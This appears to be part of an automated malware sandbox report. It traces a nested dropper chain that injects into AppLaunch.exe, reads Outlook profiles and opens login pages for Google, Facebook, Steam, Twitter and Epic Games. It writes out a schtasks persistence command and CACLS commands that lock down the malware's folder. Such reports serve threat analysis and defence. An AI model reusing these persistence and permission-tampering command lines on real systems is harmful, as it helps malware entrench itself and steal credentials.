PID 2488 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe
PID 2488 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe
PID 2488 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe
PID 4748 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe
PID 4748 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe
PID 4748 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe
PID 4072 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe
PID 4072 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe
PID 4072 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe
PID 5036 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe
PID 5036 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe
PID 5036 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe
PID 624 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe
PID 624 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe
PID 624 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 624 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe
PID 624 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe
PID 624 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5036 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe
PID 5036 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe
PID 5036 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe
PID 4072 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe
PID 4072 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe
PID 4072 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe
PID 4748 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe
PID 4748 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe
PID 2736 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2736 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2736 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2488 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe
PID 2488 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe
PID 2488 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe
PID 3784 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3784 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe

"C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5112 -ip 5112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7wp9jb68.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7wp9jb68.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CAB2.tmp\CAB3.tmp\CAB4.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7wp9jb68.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x178,0x17c,0x180,0x154,0x184,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,3494031725653989908,8833576856429239654,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,3494031725653989908,8833576856429239654,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1484,7621116590954060437,3398319035472106575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2808 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2748 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1484,7621116590954060437,3398319035472106575,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,4062161310967499117,5462985162022928676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,12972383147552689299,2052112521647140496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3928 /prefetch:1

